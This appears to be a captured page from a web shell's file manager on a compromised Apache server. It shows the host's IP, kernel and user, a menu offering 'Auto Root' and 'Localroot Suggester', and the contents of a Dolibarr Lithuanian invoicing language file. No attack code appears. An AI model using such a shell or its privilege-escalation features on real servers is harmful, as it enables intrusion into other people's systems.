Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
btm2000.bak /
langs /
lt_LT /
Delete
Unzip
Name
Size
Permission
Date
Action
accountancy.lang
19.34
KB
-rw-r--r--
2025-11-25 13:28
admin.lang
131.41
KB
-rw-r--r--
2025-11-25 13:28
agenda.lang
6.66
KB
-rw-r--r--
2025-11-25 13:28
banks.lang
7.39
KB
-rw-r--r--
2025-11-25 13:28
bills.lang
32
KB
-rw-r--r--
2025-11-25 13:28
bookmarks.lang
937
B
-rw-r--r--
2025-11-25 13:28
boxes.lang
4.46
KB
-rw-r--r--
2025-11-25 13:28
cashdesk.lang
1.25
KB
-rw-r--r--
2025-11-25 13:28
categories.lang
4.35
KB
-rw-r--r--
2025-11-25 13:28
commercial.lang
3.28
KB
-rw-r--r--
2025-11-25 13:28
companies.lang
16.24
KB
-rw-r--r--
2025-11-25 13:28
compta.lang
15.25
KB
-rw-r--r--
2025-11-25 13:28
contracts.lang
4.95
KB
-rw-r--r--
2025-11-25 13:28
cron.lang
4.6
KB
-rw-r--r--
2025-11-25 13:28
deliveries.lang
1.19
KB
-rw-r--r--
2025-11-25 13:28
dict.lang
8.64
KB
-rw-r--r--
2025-11-25 13:28
donations.lang
1.37
KB
-rw-r--r--
2025-11-25 13:28
ecm.lang
2.82
KB
-rw-r--r--
2025-11-25 13:28
errors.lang
22.21
KB
-rw-r--r--
2025-11-25 13:28
exports.lang
9.97
KB
-rw-r--r--
2025-11-25 13:28
externalsite.lang
293
B
-rw-r--r--
2025-11-25 13:28
ftp.lang
888
B
-rw-r--r--
2025-11-25 13:28
help.lang
1.81
KB
-rw-r--r--
2025-11-25 13:28
holiday.lang
4.79
KB
-rw-r--r--
2025-11-25 13:28
hrm.lang
560
B
-rw-r--r--
2025-11-25 13:28
install.lang
18.24
KB
-rw-r--r--
2025-11-25 13:28
interventions.lang
3.6
KB
-rw-r--r--
2025-11-25 13:28
languages.lang
2.49
KB
-rw-r--r--
2025-11-25 13:28
ldap.lang
1.52
KB
-rw-r--r--
2025-11-25 13:28
link.lang
471
B
-rw-r--r--
2025-11-25 13:28
loan.lang
1.17
KB
-rw-r--r--
2025-11-25 13:28
mailmanspip.lang
1.63
KB
-rw-r--r--
2025-11-25 13:28
mails.lang
9.67
KB
-rw-r--r--
2025-11-25 13:28
main.lang
29.05
KB
-rw-r--r--
2025-11-25 13:28
margins.lang
2.75
KB
-rw-r--r--
2025-11-25 13:28
members.lang
11.56
KB
-rw-r--r--
2025-11-25 13:28
modulebuilder.lang
8.05
KB
-rw-r--r--
2025-11-25 13:28
oauth.lang
1.75
KB
-rw-r--r--
2025-11-25 13:28
opensurvey.lang
3.56
KB
-rw-r--r--
2025-11-25 13:28
orders.lang
7.45
KB
-rw-r--r--
2025-11-25 13:28
other.lang
13.4
KB
-rw-r--r--
2025-11-25 13:28
paybox.lang
2.8
KB
-rw-r--r--
2025-11-25 13:28
paypal.lang
2.14
KB
-rw-r--r--
2025-11-25 13:28
printing.lang
2.28
KB
-rw-r--r--
2025-11-25 13:28
productbatch.lang
1.38
KB
-rw-r--r--
2025-11-25 13:28
products.lang
17.03
KB
-rw-r--r--
2025-11-25 13:28
projects.lang
12.49
KB
-rw-r--r--
2025-11-25 13:28
propal.lang
4.2
KB
-rw-r--r--
2025-11-25 13:28
receiptprinter.lang
1.79
KB
-rw-r--r--
2025-11-25 13:28
resource.lang
1.22
KB
-rw-r--r--
2025-11-25 13:28
salaries.lang
1.1
KB
-rw-r--r--
2025-11-25 13:28
sendings.lang
3.26
KB
-rw-r--r--
2025-11-25 13:28
sms.lang
1.81
KB
-rw-r--r--
2025-11-25 13:28
stocks.lang
11.37
KB
-rw-r--r--
2025-11-25 13:28
stripe.lang
4.08
KB
-rw-r--r--
2025-11-25 13:28
supplier_proposal.lang
2.65
KB
-rw-r--r--
2025-11-25 13:28
suppliers.lang
2.11
KB
-rw-r--r--
2025-11-25 13:28
trips.lang
7.1
KB
-rw-r--r--
2025-11-25 13:28
users.lang
5.43
KB
-rw-r--r--
2025-11-25 13:28
website.lang
7.39
KB
-rw-r--r--
2025-11-25 13:28
withdrawals.lang
6.6
KB
-rw-r--r--
2025-11-25 13:28
workflow.lang
2.6
KB
-rw-r--r--
2025-11-25 13:28
Save
Rename
# Dolibarr language file - Source file is en_US - bills Bill=Sąskaita-faktūra Bills=Sąskaitos-faktūros BillsCustomers=Customer invoices BillsCustomer=Kliento sąskaita-faktūra BillsSuppliers=Supplier invoices BillsCustomersUnpaid=Neapmokėtos kliento sąskaitos BillsCustomersUnpaidForCompany=Unpaid customer invoices for %s BillsSuppliersUnpaid=Neapmokėtos tiekėjo sąskaitos BillsSuppliersUnpaidForCompany=Unpaid supplier invoices for %s BillsLate=Pavėluoti mokėjimai BillsStatistics=Customers invoices statistics BillsStatisticsSuppliers=Suppliers invoices statistics DisabledBecauseDispatchedInBookkeeping=Disabled because invoice was dispatched into bookkeeping DisabledBecauseNotLastInvoice=Disabled because invoice is not erasable. Some invoices were recorded after this one and it will create holes in the counter. DisabledBecauseNotErasable=Disabled because cannot be erased InvoiceStandard=Standartinė sąskaita-faktūra InvoiceStandardAsk=Standartinė sąskaita-faktūra InvoiceStandardDesc=Šio tipo sąskaita-faktūra yra bendra sąskaita-faktūra. InvoiceDeposit=Down payment invoice InvoiceDepositAsk=Down payment invoice InvoiceDepositDesc=This kind of invoice is done when a down payment has been received. InvoiceProForma=Išankstinė (proforma) sąskaita-faktūra InvoiceProFormaAsk=išankstinė (proforma) sąskaita-faktūra InvoiceProFormaDesc=<b>Išankstinė sąskaita-faktūra</b> yra tikros sąskaitos forma, bet neatvaizduojama realioje apskaitoje. InvoiceReplacement=Sąskaitos-faktūros pakeitimas InvoiceReplacementAsk=Sąskaitos-faktūros pakeitimas sąskaita-faktūra InvoiceReplacementDesc=<b>Sąskaitos-faktūros pakeitimas</b> naudojamas atšaukti ir visiškai pakeisti gautą ir neapmokėtą sąskaitą-faktūrą.<br><br> Pastaba: Tik neapmokėtos sąskaitos-faktūros gali būti pakeičiamos. Jei sąskaita-faktūra, kurią keičiate, dar nėra uždaryta, ji bus automatiškai uždaryta ir pažymėta kaip "neįvykusi". InvoiceAvoir=Kreditinė sąskaita (kredito aviza) InvoiceAvoirAsk=Kreditinė sąskaita tikslinanti sąskaitą-faktūrą InvoiceAvoirDesc=<b>Kreditinė sąskaita</b> yra neigiama sąskaita-faktūra, naudojama išspręsti faktui, kai sąskaitos-faktūros suma realiai skiriasi nuo sumokėtos sumos (nes klientas per klaidą sumokėjo per daug, ar nesumokėjo pilnai, nes grąžino dalį produktų). invoiceAvoirWithLines=Sukurti kreditinę sąskaitą su eilutėmis iš originalios sąskaitos-faktūros invoiceAvoirWithPaymentRestAmount=Create Credit Note with remaining unpaid of origin invoice invoiceAvoirLineWithPaymentRestAmount=Credit Note for remaining unpaid amount ReplaceInvoice=Pakeisti sąskaitą %s ReplacementInvoice=Sąskaitos-faktūros pakeitimas ReplacedByInvoice=Pakeistas sąskaita %s ReplacementByInvoice=Pakeistas sąskaita CorrectInvoice=Koreguoti sąskaitą-faktūrą %s CorrectionInvoice=Sąskaitos korekcija UsedByInvoice=Panaudota sąskaitos-faktūros apmokėjimui %s ConsumedBy=Suvartota NotConsumed=Nesuvartota NoReplacableInvoice=Nėra keičiamų sąskaitų-faktūrų NoInvoiceToCorrect=Nėra koreguojamų sąskaitų-faktūrų InvoiceHasAvoir=Was source of one or several credit notes CardBill=Sąskaitos-faktūros kortelė PredefinedInvoices=Iš anksto apibrėžtos sąskaitos-faktūros Invoice=Sąskaita-faktūra PdfInvoiceTitle=Sąskaita-faktūra Invoices=Sąskaitos-faktūros InvoiceLine=Sąskaitos-faktūros linija InvoiceCustomer=Kliento sąskaita-faktūra CustomerInvoice=Kliento sąskaita-faktūra CustomersInvoices=Klientų sąskaitos-faktūros SupplierInvoice=Tiekėjo sąskaita-faktūra SuppliersInvoices=Tiekėjų sąskaitos-faktūros SupplierBill=Tiekėjo sąskaita-faktūra SupplierBills=tiekėjų sąskaitos-faktūros Payment=Mokėjimas PaymentBack=Mokėjimas atgal (grąžinimas) CustomerInvoicePaymentBack=Mokėjimas atgal (grąžinimas) Payments=Mokėjimai PaymentsBack=Mokėjimai atgal (grąžinimai) paymentInInvoiceCurrency=in invoices currency PaidBack=Sumokėta atgal (grąžinta) DeletePayment=Ištrinti mokėjimą ConfirmDeletePayment=Are you sure you want to delete this payment? ConfirmConvertToReduc=Do you want to convert this %s into an absolute discount ?<br>The amount will so be saved among all discounts and could be used as a discount for a current or a future invoice for this customer. ConfirmConvertToReducSupplier=Do you want to convert this %s into an absolute discount ?<br>The amount will so be saved among all discounts and could be used as a discount for a current or a future invoice for this supplier. SupplierPayments=Tiekėjų mokėjimai ReceivedPayments=Gauti mokėjimai ReceivedCustomersPayments=Iš klientų gauti mokėjimai PayedSuppliersPayments=Mokėjimai sumokėti tiekėjams ReceivedCustomersPaymentsToValid=Gauti klientų mokėjimai tikrinimui ir pripažinimui galiojančiais PaymentsReportsForYear=Mokėjimų ataskaitos %s PaymentsReports=Mokėjimų ataskaitos PaymentsAlreadyDone=Jau atlikti mokėjimai PaymentsBackAlreadyDone=Jau atlikti mokėjimai atgal (grąžinimai) PaymentRule=Mokėjimo taisyklė PaymentMode=Mokėjimo būdas PaymentTypeDC=Debit/Credit Card PaymentTypePP=PayPal IdPaymentMode=Payment type (id) CodePaymentMode=Payment type (code) LabelPaymentMode=Payment type (label) PaymentModeShort=Mokėjimo būdas PaymentTerm=Mokėjimo terminas PaymentConditions=Apmokėjimo terminai PaymentConditionsShort=Apmokėjimo terminai PaymentAmount=Mokėjimo suma ValidatePayment=Mokėjimą pripažinti galiojančiu PaymentHigherThanReminderToPay=Mokėjimas svarbesnis už priminimą sumokėti HelpPaymentHigherThanReminderToPay=Dėmesio, vienos ar kelių sąskaitų mokėjimo suma yra didesnė nei reikalingas sumokėti likutis.<br> Redaguokite įvedimą, arba patvirtinkite ir galvokite apie kreditinės sąskaitos kūrimą gautam perviršiui nuo kiekvienos permokėtos sąskaitos. HelpPaymentHigherThanReminderToPaySupplier=Attention, the payment amount of one or more bills is higher than the rest to pay. <br> Edit your entry, otherwise confirm and think about creating a credit note of the excess paid for each overpaid invoice. ClassifyPaid=Priskirti 'Apmokėtos' ClassifyPaidPartially=Priskirti 'Dalinai apmokėtos' ClassifyCanceled=Priskirti 'Neįvykusios' ClassifyClosed=Priskirti 'Uždarytos' ClassifyUnBilled=Classify 'Unbilled' CreateBill=Sukurti sąskaitą-faktūrą CreateCreditNote=Sukurti kreditinę sąskaitą AddBill=Create invoice or credit note AddToDraftInvoices=Pridėti į projektinę sąskaitą-faktūrą DeleteBill=Ištrinti sąskaitą-faktūrą SearchACustomerInvoice=Ieškoti kliento sąskaitos-faktūros SearchASupplierInvoice=Ieškoti tiekėjo sąskaitos-faktūros CancelBill=Atšaukti sąskaitą-faktūrą SendRemindByMail=Siųsti priminimą e-paštu DoPayment=Enter payment DoPaymentBack=Enter refund ConvertToReduc=Mark as credit available ConvertExcessReceivedToReduc=Convert excess received into available credit ConvertExcessPaidToReduc=Convert excess paid into available discount EnterPaymentReceivedFromCustomer=Įveskite gautą iš kliento mokėjimą EnterPaymentDueToCustomer=Atlikti mokėjimą klientui DisabledBecauseRemainderToPayIsZero=Disabled because remaining unpaid is zero PriceBase=Kainos bazė BillStatus=Sąskaitos-faktūros būklė StatusOfGeneratedInvoices=Status of generated invoices BillStatusDraft=Projektas (turi būti pripažintas galiojančiu) BillStatusPaid=Apmokėtas BillStatusPaidBackOrConverted=Credit note refund or marked as credit available BillStatusConverted=Paid (ready for consumption in final invoice) BillStatusCanceled=Neįvykęs BillStatusValidated=Pripažintas galiojančiu (turi būti apmokėtas) BillStatusStarted=Pradėtas BillStatusNotPaid=Neapmokėta BillStatusNotRefunded=Not refunded BillStatusClosedUnpaid=Uždaryta (neapmokėta) BillStatusClosedPaidPartially=Dalinai apmokėta BillShortStatusDraft=Projektas BillShortStatusPaid=Apmokėta BillShortStatusPaidBackOrConverted=Refund or converted BillShortStatusConverted=Apmokėtas BillShortStatusCanceled=Neįvykusi BillShortStatusValidated=Pripažinta galiojančia BillShortStatusStarted=Pradėta BillShortStatusNotPaid=Neapmokėta BillShortStatusNotRefunded=Not refunded BillShortStatusClosedUnpaid=Uždaryta BillShortStatusClosedPaidPartially=Dalinai apmokėta PaymentStatusToValidShort=Pripažinti galiojančia ErrorVATIntraNotConfigured=Vidinis PVM numeris nėra apibrėžtas ErrorNoPaiementModeConfigured=Mokėjimo būdas pagal nutylėjimą nėra apibrėžtas. Eiti į Sąskaitų-faktūrų modulio nustatymus išspręsti šią problemą. ErrorCreateBankAccount=Sukurti banko sąskaitą, tada eiti į Nustatymų meniu Sąskaitų-faktūrų modulį ir apibrėžti mokėjimo būdus ErrorBillNotFound=Sąskaita-faktūra %s neegzistuoja ErrorInvoiceAlreadyReplaced=Klaida, Jūs bandote pripažinti galiojančia sąskaitą-faktūrą ir ja pakeisti sąskaitą-faktūrą %s. Bet ši jau anksčiau buvo pakeista sąskaita-faktūra: %s. ErrorDiscountAlreadyUsed=Klaida, nuolaida jau panaudota ErrorInvoiceAvoirMustBeNegative=Klaida, teisinga sąskaita-faktūra turi turėti neigiamą sumą ErrorInvoiceOfThisTypeMustBePositive=Klaida, šis sąskaitos-faktūros tipas turi turėti teigiamą sumą ErrorCantCancelIfReplacementInvoiceNotValidated=Klaida negalima atšaukti sąskaitos-faktūros, kuri buvo pakeista kita sąskaita-faktūra, kuri vis dar yra projektinėje būklėje ErrorThisPartOrAnotherIsAlreadyUsedSoDiscountSerieCantBeRemoved=This part or another is already used so discount serie cant be removed. BillFrom=Iš BillTo=Į ActionsOnBill=Veiksmai sąskaitoje-faktūroje RecurringInvoiceTemplate=Template / Recurring invoice NoQualifiedRecurringInvoiceTemplateFound=No recurring template invoice qualified for generation. FoundXQualifiedRecurringInvoiceTemplate=Found %s recurring template invoice(s) qualified for generation. NotARecurringInvoiceTemplate=Not a recurring template invoice NewBill=Nauja sąskaita-faktūra LastBills=Latest %s invoices LatestTemplateInvoices=Latest %s template invoices LatestCustomerTemplateInvoices=Latest %s customer template invoices LatestSupplierTemplateInvoices=Latest %s supplier template invoices LastCustomersBills=Latest %s customer invoices LastSuppliersBills=Latest %s supplier invoices AllBills=Visos sąskaitos-faktūros AllCustomerTemplateInvoices=All template invoices OtherBills=Kitos sąskaitos-faktūros DraftBills=Sąskaitų-faktūrų projektai CustomersDraftInvoices=Customer draft invoices SuppliersDraftInvoices=Supplier draft invoices Unpaid=Neapmokėta ConfirmDeleteBill=Are you sure you want to delete this invoice? ConfirmValidateBill=Are you sure you want to validate this invoice with reference <b>%s</b>? ConfirmUnvalidateBill=Are you sure you want to change invoice <b>%s</b> to draft status? ConfirmClassifyPaidBill=Are you sure you want to change invoice <b>%s</b> to status paid? ConfirmCancelBill=Are you sure you want to cancel invoice <b>%s</b>? ConfirmCancelBillQuestion=Why do you want to classify this invoice 'abandoned'? ConfirmClassifyPaidPartially=Are you sure you want to change invoice <b>%s</b> to status paid? ConfirmClassifyPaidPartiallyQuestion=This invoice has not been paid completely. What are reasons for you to close this invoice? ConfirmClassifyPaidPartiallyReasonAvoir=Remaining unpaid <b>(%s %s)</b> is a discount granted because payment was made before term. I regularise the VAT with a credit note. ConfirmClassifyPaidPartiallyReasonDiscount=Remaining unpaid <b>(%s %s)</b> is a discount granted because payment was made before term. ConfirmClassifyPaidPartiallyReasonDiscountNoVat=Remaining unpaid <b>(%s %s)</b> is a discount granted because payment was made before term. I accept to lose the VAT on this discount. ConfirmClassifyPaidPartiallyReasonDiscountVat=Remaining unpaid <b>(%s %s)</b> is a discount granted because payment was made before term. I recover the VAT on this discount without a credit note. ConfirmClassifyPaidPartiallyReasonBadCustomer=Blogas klientas ConfirmClassifyPaidPartiallyReasonProductReturned=Produktų dalis grąžinta ConfirmClassifyPaidPartiallyReasonOther=Suma atsisakyta dėl kitų priežasčių ConfirmClassifyPaidPartiallyReasonDiscountNoVatDesc=Šis pasirinkimas yra įmanomas, jei jūsų sąskaita-faktūra buvo pateikta su tinkama pastaba. (Pvz.:"Tik mokesčiai, susiję su kaina, kuri buvo faktiškai sumokėta, suteikia teises į išskaitą") ConfirmClassifyPaidPartiallyReasonDiscountVatDesc=Kai kuriose šalyse, šis pasirinkimas galimas tik tada, jei jūsų sąskaita-faktūra turi tinkamą pastabą. ConfirmClassifyPaidPartiallyReasonAvoirDesc=Naudokite šį pasirinkimą, jei visi kiti netinka ConfirmClassifyPaidPartiallyReasonBadCustomerDesc=<b>Blogas klientas</b> yra klientas, kad atsisako apmokėti savo skolą. ConfirmClassifyPaidPartiallyReasonProductReturnedDesc=Šis pasirinkimas yra naudojamas, kai mokėjimas neatliktas, nes kai kurie produktai buvo grąžinti ConfirmClassifyPaidPartiallyReasonOtherDesc=Naudokite šį pasirinkimą, jei visi kiti netinka, pvz., šiais atvejais: <br>- Apmokėjimas neatliktas, nes kai kurie produktai buvo išsiųsti atgal<br>- Reikalaujama suma pernelyg svarbi, nes nuolaida buvo pamiršta <br>Visais atvejais per didelė reikalaujama suma turi būti ištaisyta apskaitos sistemoje sukuriant kreditinę sąskaitą. ConfirmClassifyAbandonReasonOther=Kita ConfirmClassifyAbandonReasonOtherDesc=Šis pasirinkimas bus naudojamas visais kitais atvejais. Pvz, kai jūs ketinate sukurti pakeičiančią sąskaitą-faktūrą. ConfirmCustomerPayment=Do you confirm this payment input for <b>%s</b> %s? ConfirmSupplierPayment=Do you confirm this payment input for <b>%s</b> %s? ConfirmValidatePayment=Are you sure you want to validate this payment? No change can be made once payment is validated. ValidateBill=Sąskaitą-faktūrą pripažinti galiojančia UnvalidateBill=Sąskaitą-faktūra pripažinti negaliojančia NumberOfBills=Sąskaitų-faktūrų skaičius NumberOfBillsByMonth=Sąskaitų-faktūrų skaičius pagal mėnesius AmountOfBills=Sąskaitų-faktūrų suma AmountOfBillsByMonthHT=Sąskaitų-faktūrų suma pagal mėnesius (atskaičius mokesčius) ShowSocialContribution=Show social/fiscal tax ShowBill=Rodyti sąskaitą-faktūrą ShowInvoice=Rodyti sąskaitą-faktūrą ShowInvoiceReplace=Rodyti pakeičiančią sąskaitą-faktūrą ShowInvoiceAvoir=Rodyti kreditinę sąskaitą ShowInvoiceDeposit=Show down payment invoice ShowInvoiceSituation=Show situation invoice ShowPayment=Rodyti mokėjimą AlreadyPaid=Jau apmokėta AlreadyPaidBack=Mokėjimas jau grąžintas AlreadyPaidNoCreditNotesNoDeposits=Already paid (without credit notes and down payments) Abandoned=Neįvykusi RemainderToPay=Remaining unpaid RemainderToTake=Remaining amount to take RemainderToPayBack=Remaining amount to refund Rest=Laukiantis AmountExpected=Reikalaujama suma ExcessReceived=Gautas perviršis ExcessPaid=Excess paid EscompteOffered=Siūloma nuolaida (mokėjimas prieš terminą) EscompteOfferedShort=Nuolaida SendBillRef=Submission of invoice %s SendReminderBillRef=Submission of invoice %s (reminder) StandingOrders=Direct debit orders StandingOrder=Direct debit order NoDraftBills=Nėra sąskaitų-faktūrų projektų NoOtherDraftBills=Nėra kitų sąskaitų-faktūrų projektų NoDraftInvoices=Nėra sąskaitų-faktūrų projektų RefBill=Sąskaitos-faktūros nuoroda ToBill=Pateikti sąskaitą RemainderToBill=Pateikti sąskatą likučiui SendBillByMail=Siųsti sąskaitą-faktūrą e-paštu SendReminderBillByMail=Siųsti priminimą e-paštu RelatedCommercialProposals=Susiję komerciniai pasiūlymai RelatedRecurringCustomerInvoices=Related recurring customer invoices MenuToValid=Įteisinti DateMaxPayment=Payment due on DateInvoice=Sąskaitos-faktūros data DatePointOfTax=Point of tax NoInvoice=Nėra sąskaitos-faktūros ClassifyBill=Priskirti sąskaitą-faktūrą SupplierBillsToPay=Neapmokėtos tiekėjo sąskaitos CustomerBillsUnpaid=Neapmokėtos kliento sąskaitos NonPercuRecuperable=Neatitaisomas SetConditions=Nustatykite mokėjimo terminus SetMode=Nustatykite mokėjimo būdą SetRevenuStamp=Set revenue stamp Billed=Pateikta sąskaita RecurringInvoices=Recurring invoices RepeatableInvoice=Template invoice RepeatableInvoices=Template invoices Repeatable=Template Repeatables=Templates ChangeIntoRepeatableInvoice=Convert into template invoice CreateRepeatableInvoice=Create template invoice CreateFromRepeatableInvoice=Create from template invoice CustomersInvoicesAndInvoiceLines=Klientų sąskaitos-faktūros ir sąskaitų-faktūrų serijos CustomersInvoicesAndPayments=Kliento sąskaitos-faktūros ir mokėjimai ExportDataset_invoice_1=Kliento sąskaitų-faktūrų sąrašas ir sąskaitų-faktūros serijos ExportDataset_invoice_2=Kliento sąskaitos-faktūros ir mokėjimai ProformaBill=Išankstinė sąskaita: Reduction=Sumažinimas ReductionShort=Mažinimo. Reductions=Sumažinimai ReductionsShort=Mažinimo. Discounts=Nuolaidos AddDiscount=Sukurti nuolaidą AddRelativeDiscount=Sukurti susijusią nuolaidą EditRelativeDiscount=Redaguoti susijusią nuolaidą AddGlobalDiscount=Sukurti absoliutinę nuolaidą EditGlobalDiscounts=Redaguoti absoliutines nuolaidos AddCreditNote=Sukurti kreditinę sąskaitą ShowDiscount=Rodyti nuolaidą ShowReduc=Rodyti atskaitymą RelativeDiscount=Susijusi nuolaida GlobalDiscount=Visuotinė nuolaida CreditNote=Kreditinė sąskaita CreditNotes=Kreditinės sąskaitos CreditNotesOrExcessReceived=Credit notes or excess received Deposit=Down payment Deposits=Down payments DiscountFromCreditNote=Nuolaida kreditinei sąskaitai %s DiscountFromDeposit=Down payments from invoice %s DiscountFromExcessReceived=Payments in excess of invoice %s DiscountFromExcessPaid=Payments in excess of invoice %s AbsoluteDiscountUse=Ši kredito rūšis gali būti naudojama sąskaitai-faktūrai prieš ją pripažįstant galiojančia CreditNoteDepositUse=Invoice must be validated to use this kind of credits NewGlobalDiscount=Nauja absoliutinė nuolaida NewRelativeDiscount=Naujas susijusi nuolaida DiscountType=Discount type NoteReason=Pastaba / Priežastis ReasonDiscount=Priežastis DiscountOfferedBy=Suteiktos DiscountStillRemaining=Discounts or credits available DiscountAlreadyCounted=Discounts or credits already consumed CustomerDiscounts=Customer discounts SupplierDiscounts=Vendors discounts BillAddress=Sąskaitos adresas HelpEscompte=Ši nuolaida yra nuolaida suteikiama klientui, nes jo mokėjimas buvo atliktas prieš terminą. HelpAbandonBadCustomer=Šios sumos buvo atsisakyta (blogas klientas) ir ji yra laikoma išimtiniu nuostoliu. HelpAbandonOther=Šios sumos buvo atsisakyta, nes tai buvo klaida (pvz.: neteisingas klientas arba sąskaita-faktūra buvo pakeista kita) IdSocialContribution=Social/fiscal tax payment id PaymentId=Mokėjimo ID PaymentRef=Payment ref. InvoiceId=Sąskaitos-faktūros ID InvoiceRef=Sąskaitos-faktūros nuoroda InvoiceDateCreation=Sąskaitos-faktūros sukūrimo datą InvoiceStatus=Sąskaitos-faktūros būklė InvoiceNote=Sąskaitos-faktūros pastaba InvoicePaid=Sąskaita-faktūra apmokėta PaymentNumber=Mokėjimo numeris RemoveDiscount=Pašalinti nuolaidą WatermarkOnDraftBill=Vandens ženklas ant sąskaitos-faktūros projekto (nėra, jei lapas tuščias) InvoiceNotChecked=Nėra pasirinktų sąskaitų-faktūrų CloneInvoice=Klonuoti sąskaitą-faktūrą ConfirmCloneInvoice=Are you sure you want to clone this invoice <b>%s</b>? DisabledBecauseReplacedInvoice=Veiksmas išjungtas, nes sąskaita-faktūra buvo pakeista DescTaxAndDividendsArea=This area presents a summary of all payments made for special expenses. Only record with payment during the fixed year are included here. NbOfPayments=Mokėjimų numeriai SplitDiscount=Padalinti nuolaidą į dvi dalis ConfirmSplitDiscount=Are you sure you want to split this discount of <b>%s</b> %s into 2 lower discounts? TypeAmountOfEachNewDiscount=Įveskite sumą kiekvienai iš dviejų dalių: TotalOfTwoDiscountMustEqualsOriginal=Dviejų naujų nuolaidų suma turi būti lygi pradinei nuolaidai. ConfirmRemoveDiscount=Are you sure you want to remove this discount? RelatedBill=Susijusi sąskaita-faktūra RelatedBills=Susiję sąskaitos-faktūros RelatedCustomerInvoices=Related customer invoices RelatedSupplierInvoices=Related supplier invoices LatestRelatedBill=Latest related invoice WarningBillExist=Warning, one or more invoice already exist MergingPDFTool=Merging PDF tool AmountPaymentDistributedOnInvoice=Payment amount distributed on invoice PaymentOnDifferentThirdBills=Allow payments on different thirdparties bills but same parent company PaymentNote=Payment note ListOfPreviousSituationInvoices=List of previous situation invoices ListOfNextSituationInvoices=List of next situation invoices ListOfSituationInvoices=List of situation invoices CurrentSituationTotal=Total current situation DisabledBecauseNotEnouthCreditNote=To remove a situation invoice from cycle, this invoice's credit note total must cover this invoice total RemoveSituationFromCycle=Remove this invoice from cycle ConfirmRemoveSituationFromCycle=Remove this invoice %s from cycle ? ConfirmOuting=Confirm outing FrequencyPer_d=Every %s days FrequencyPer_m=Every %s months FrequencyPer_y=Every %s years FrequencyUnit=Frequency unit toolTipFrequency=Examples:<br><b>Set 7, Day</b>: give a new invoice every 7 days<br><b>Set 3, Month</b>: give a new invoice every 3 month NextDateToExecution=Date for next invoice generation NextDateToExecutionShort=Date next gen. DateLastGeneration=Date of latest generation DateLastGenerationShort=Date latest gen. MaxPeriodNumber=Max number of invoice generation NbOfGenerationDone=Number of invoice generation already done NbOfGenerationDoneShort=Number of generation done MaxGenerationReached=Maximum number of generations reached InvoiceAutoValidate=Validate invoices automatically GeneratedFromRecurringInvoice=Generated from template recurring invoice %s DateIsNotEnough=Date not reached yet InvoiceGeneratedFromTemplate=Invoice %s generated from recurring template invoice %s WarningInvoiceDateInFuture=Warning, the invoice date is higher than current date WarningInvoiceDateTooFarInFuture=Warning, the invoice date is too far from current date ViewAvailableGlobalDiscounts=View available discounts # PaymentConditions Statut=Būklė PaymentConditionShortRECEP=Due Upon Receipt PaymentConditionRECEP=Due Upon Receipt PaymentConditionShort30D=30 dienų PaymentCondition30D=30 dienų PaymentConditionShort30DENDMONTH=30 days of month-end PaymentCondition30DENDMONTH=Within 30 days following the end of the month PaymentConditionShort60D=60 dienų PaymentCondition60D=60 dienų PaymentConditionShort60DENDMONTH=60 days of month-end PaymentCondition60DENDMONTH=Within 60 days following the end of the month PaymentConditionShortPT_DELIVERY=Pristatymas PaymentConditionPT_DELIVERY=Pristatymo metu PaymentConditionShortPT_ORDER=Užsakymas PaymentConditionPT_ORDER=Užsakymo metu PaymentConditionShortPT_5050=50-50 PaymentConditionPT_5050=50%% iš anksto, 50%% pristatymo metu PaymentConditionShort10D=10 days PaymentCondition10D=10 days PaymentConditionShort10DENDMONTH=10 days of month-end PaymentCondition10DENDMONTH=Within 10 days following the end of the month PaymentConditionShort14D=14 days PaymentCondition14D=14 days PaymentConditionShort14DENDMONTH=14 days of month-end PaymentCondition14DENDMONTH=Within 14 days following the end of the month FixAmount=Nustatyti dydį VarAmount=Kintamas dydis (%% tot.) VarAmountOneLine=Variable amount (%% tot.) - 1 line with label '%s' # PaymentType PaymentTypeVIR=Banko pervedimas PaymentTypeShortVIR=Banko pervedimas PaymentTypePRE=Direct debit payment order PaymentTypeShortPRE=Debit payment order PaymentTypeLIQ=Grynieji pinigai PaymentTypeShortLIQ=Grynieji pinigai PaymentTypeCB=Kreditinė kortelė PaymentTypeShortCB=Kreditinė kortelė PaymentTypeCHQ=Čekis PaymentTypeShortCHQ=Čekis PaymentTypeTIP=TIP (Documents against Payment) PaymentTypeShortTIP=TIP Payment PaymentTypeVAD=Tiesioginis mokėjimas (online) PaymentTypeShortVAD=Tiesioginis mokėjimas (online) PaymentTypeTRA=Bank draft PaymentTypeShortTRA=Projektas PaymentTypeFAC=Factor PaymentTypeShortFAC=Factor BankDetails=Banko duomenys BankCode=Banko kodas DeskCode=Skyriaus kodas BankAccountNumber=Sąskaitos numeris BankAccountNumberKey=Raktas Residence=Direct debit IBANNumber=IBAN numeris IBAN=IBAN BIC=BIC/SWIFT BICNumber=BIC/SWIFT numeris ExtraInfos=Papildoma informacija RegulatedOn=Reguliuojama ChequeNumber=Čekio N° ChequeOrTransferNumber=Čekio/Pervedimo N° ChequeBordereau=Check schedule ChequeMaker=Check/Transfer transmitter ChequeBank=Čekio bankas CheckBank=Patikrinti NetToBePaid=Grynasis mokėjimas PhoneNumber=Tel FullPhoneNumber=Telefonas TeleFax=Faksas PrettyLittleSentence=Priimti mokėtiną sumą čekiais išleistais mano vardu kaip Apskaitos Asociacijos, patvirtintos Fiskalinės Administracijos, nariui. IntracommunityVATNumber=Bendrijos vidinis PVM numeris PaymentByChequeOrderedTo=Čekį (įskaitant mokesčius), mokamą į %s siųsti PaymentByChequeOrderedToShort=Čekis (įskaitant mokesčius) yra mokamas SendTo=išsiųstas PaymentByTransferOnThisBankAccount=Apmokėjimas pavedimu į šią banko sąskaitą VATIsNotUsedForInvoice=* Netaikoma PVM art-293B iš CGI LawApplicationPart1=Taikant įstatymus 80,335 iš 12/05/80 LawApplicationPart2=Prekės lieka nuosavybe LawApplicationPart3=Pardavėjas, iki pilno išgryninimo iš LawApplicationPart4=jų kaina. LimitedLiabilityCompanyCapital=SARL su Kapitalu UseLine=Taikyti UseDiscount=Taikyti nuolaidą UseCredit=Taikyti kreditą UseCreditNoteInInvoicePayment=Sumažinti mokėjimo sumą su šiuo kreditu MenuChequeDeposits=Čekių depozitai MenuCheques=Čekiai 